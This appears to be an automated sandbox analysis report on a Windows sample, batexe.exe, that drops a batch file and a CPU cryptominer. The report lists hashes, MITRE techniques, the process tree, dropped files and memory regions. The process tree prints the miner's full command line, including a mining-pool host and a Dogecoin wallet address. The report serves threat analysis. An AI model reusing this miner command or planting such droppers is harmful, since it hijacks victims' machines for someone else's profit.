73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
300s
max time network
305s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
24-02-2024 06:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation	b2e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000\Control Panel\International\Geo\Nation	batexe.exe

Executes dropped EXE 2 IoCs

pid	Process
2500	b2e.exe
1524	cpuminer-sse2.exe

Loads dropped DLL 6 IoCs

pid	Process
1524	cpuminer-sse2.exe
1524	cpuminer-sse2.exe
1524	cpuminer-sse2.exe
1524	cpuminer-sse2.exe
1524	cpuminer-sse2.exe
1524	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4824-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4824 wrote to memory of 2500	4824	batexe.exe	94
PID 4824 wrote to memory of 2500	4824	batexe.exe	94
PID 4824 wrote to memory of 2500	4824	batexe.exe	94
PID 2500 wrote to memory of 392	2500	b2e.exe	95
PID 2500 wrote to memory of 392	2500	b2e.exe	95
PID 2500 wrote to memory of 392	2500	b2e.exe	95
PID 392 wrote to memory of 1524	392	cmd.exe	98
PID 392 wrote to memory of 1524	392	cmd.exe	98

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4824
- C:\Users\Admin\AppData\Local\Temp\4AEF.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\4AEF.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\4AEF.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5251.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:392
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1524

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4AEF.tmp\b2e.exe

Filesize
491KB

MD5
5d806d1b502ed86ffed97b4e2170e32c

SHA1
96b47bcfdd7179360100fd91449f6d34bca0f312

SHA256
900611d3e7cf3b5d8a2b2b2501f3a24cb8d993da27d31beb422124eb86ae27a2

SHA512
60057f153868bf2cd70482871c6410041e8dfd4bbe93eb51bd3ff7f7abd7a4fbd1077ebc7bfc953eef2213c906637c54cfe0865b7e72238e65dc0e25403a4346

Download Submit
C:\Users\Admin\AppData\Local\Temp\4AEF.tmp\b2e.exe

Filesize
1.6MB

MD5
3cc53a135d88ef81b6e000a90c2e59d0

SHA1
9fe4baf29e0671cb0f6ed7bf4dbbd00051824ed2

SHA256
ff8a2d25d200a2203157662754c6a2369ddf5b809710f356921c9b5bb50c3878

SHA512
4f0a31b75d5ef9cdf1fcf9566e3beb65864a58bae6221422bbda3818ea87e08cd69bff98e9547653aab2e92840ad7d1c96cd61b8162571ce436ffbee028fabff

Download Submit
C:\Users\Admin\AppData\Local\Temp\4AEF.tmp\b2e.exe

Filesize
1.5MB

MD5
29c7095eebdc6bbdfc1c86ff11fd4fcd

SHA1
b7683d6e9ce13d26af60ddc9008cf341754eefac

SHA256
6fc4a5a1d123d253d23ef1e4d747d8ca05b4dd412d9cd86483c1a8bdc8b72f8a

SHA512
df67cbd6d8ce0b8d543c465e861956970a72a1d2d0ef566cc8371e34e1f3751f53b457db8c8c11cabc9151864c86979a95909b400fd092df6e9f6b5894ab2956

Download Submit
C:\Users\Admin\AppData\Local\Temp\5251.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
536KB

MD5
836a5df075d82963b7e8c9f4d96593f2

SHA1
4b927d92f1b8a4668ea0579ff3c59b4bc8ff6462

SHA256
acdb93df7c353d27fb82c4fe22393fc6e40109d8541fa71df913fda2630e701f

SHA512
1ef9b21fee71de937b101c33ee8716aad221d426750fc5f1e9750a50bb6c130149102c030bfa67863a1d64729c99b7fab60c68550cc3f154ef368a7f35ec2ffb

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
697KB

MD5
da4db99a3aaf36f7f186cbeb6d0643d0

SHA1
5f8042cb87585efa368daff505a71f8c8016ea44

SHA256
7ba3d6be9a41cebc68ca3d2bba04f7d5d080a5dd2ffe7c2553c8ec898f6fc5d2

SHA512
08670d3711c526ae74302c963f438444cfb655daaac7c18dc72b10f1fbeab73f306d9dcc4e23c1bebdaf640d75e6dcfa0eb5355ed3628617478353f032425348

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
418KB

MD5
0f121ece0006095fd2b9538f839c1176

SHA1
8461bbb528c391e1b400e6c0acfd7ae9dab2bb5c

SHA256
d0feb98d28109a5db458c78033096b7bd059254d2f4effc5ec85e6c3f02cc483

SHA512
868abc6e47a5981427ffe9765c53d5c669e036ff810637e011dd325d17f6b6e22a74f11f75178596cc849ab1b86beabeb6111d5a727e292f1a4595796a608819

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
622KB

MD5
abfefa75bf49ff004405c33c60204928

SHA1
d7cb2d171186ee27436d9f4d4872b2700951a805

SHA256
5b889e032f6685aa6630484b9836d7311056e20de084e6a4a032174970fef73c

SHA512
93936a4a1cc9fdaf2fe8f757af2649cfa96973dd86b7cd344b7e8c47773d540f277d66f99f586794bfa98c60d2d99d651bf2cc9a3e89a46b7ee8a604b244fca3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
392KB

MD5
da4dee51af27e7ee968a8b56fceabdef

SHA1
d1fd62887bb831313e1f3d763cf5b5d8077af7d6

SHA256
8f4c5e4ed9accefd2ffb6db2643940c0bf664f13a37c561c6592d8fe774b5845

SHA512
9564f88c4fefbbbd74f9534c0fce6e9ae7216829f1cea05dcb182a8b65a1da8009461d28c8baaa31a6ae3cef6684e85b78a617304b206a310c8501fc1a6ccd76

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
527KB

MD5
8d6d8a37e9d900fdbafff9ca334361b8

SHA1
e2951e05ec78c4e28f64f2d55f027ab9cdecb67d

SHA256
a262e6571d908ea96d80781bb6d80244aa6bbb366bcf60aab2b12c7d3d80d38d

SHA512
0a0ffe4d2bb18a6cbf34755433eaefb2dd9bcab30bb697801ba95214ffd27264555f4ed2742356480c061f0c5aaf9d5db4fab18209ab8c49b4df4ee79bf93831

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
368KB

MD5
b7f1ec761cc544da0db4635776389b6d

SHA1
955f751000c5d0ad45b8063b7b75bbc6cc0a87b3

SHA256
23e39b47796ed438789ef57846e65b9cea3ef8fc16bf1a6613722d5d825dd78c

SHA512
c8116f028327b86242da900bd7dd62b38f8258df423b66139cf2ef238862ff8277a8b9c7cbdac81262993467e73cc88eaae15782581786ace9e4576f2e86a114

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
269KB

MD5
ebe9af3568c9f85c81f245c86dcd48a1

SHA1
6552e0b55c6fba2245c5cbc34cb15758cf295faf

SHA256
562d8806eca2e790f1c55a23090a92f1b595099151d94143ba511cc53a5af4d2

SHA512
bf30fd25f78c95d756f0a1b105b7799e48c265c715eb86be35c011fdedcb96aa897ba761b31f1565f7fb953146f9099e37b2c52c2bf4dda337aee1938f05a7f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
455KB

MD5
75de56d3f17838de5d73ab6c0da9eea3

SHA1
62910e6c96a691d03058bc1e12eb00429e9a8810

SHA256
052da6e82e8fcfe006764dfd2f92c35f324db8f1a36ddf998377aa58fdb966f6

SHA512
4ecc94ff7a0e075fc1e46b41db37fd7a1fa0ded69611c6ac7bcf87e964734dec6c0bfe5291d73db9aed7a3a3c057147da0e3989915f142803bc49d0df8c33f11

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
477KB

MD5
4f44b191a0a87b32741678f6792119b9

SHA1
a7bc13856cbde5b8e01606c9c8da1be4d2b17f49

SHA256
c36161595182fd3f83bc3aaa308302a0dcd0a8eb156d22735b9f6ef9a59d7274

SHA512
a86cb67bd69d1f51c73f60394f6bdc39c37f4a1cfd16ec0ab37703829bb8946769dbcc245642563d74ca883bb64cf3656fd8280ceaf0d7f1a83f5fbed2a58250

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
122KB

MD5
e44f2c12b86362dc2899e873cf8b0be5

SHA1
a11fdc82e6bc167c18484fd1096fdfe6bbde9e16

SHA256
14110f28ed6a67f7cd9110f8058dbabc8d0c228e7934127df991ed5a84713c52

SHA512
40bee88492943c45a636526e727c41e3988f05dfc9195e573487cf1994a7659150a43be11e6c84e14635e72c70e692948450c683f9ffe482502c563a0a03952b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
30KB

MD5
9b722cd78ff9c2fd0ab82eea6ec4b4ad

SHA1
e6ff0da84091378eea321acf3aa1428e43d3b8ba

SHA256
bf8733f901ead30cca052b73f9e60a1f56a40b330bc28a029dbc7fa98466cb1d

SHA512
738bd0675aeb9d059cf58d11e131993d00af09d5ec229abf0ac378e14f1632c39279b91198a4e35546d6d0cf564170b663aae315e047870976f0042ed3d32442

Download Submit
memory/1524-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1524-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1524-106-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1524-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1524-46-0x000000006FC40000-0x00000000714F5000-memory.dmp

Filesize
24.7MB

Download
memory/1524-47-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1524-48-0x0000000000870000-0x000000000092C000-memory.dmp

Filesize
752KB

Download
memory/1524-49-0x000000005EFE0000-0x000000005F078000-memory.dmp

Filesize
608KB

Download
memory/1524-50-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1524-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1524-42-0x0000000000870000-0x000000000092C000-memory.dmp

Filesize
752KB

Download
memory/1524-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1524-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1524-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1524-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2500-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2500-55-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4824-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download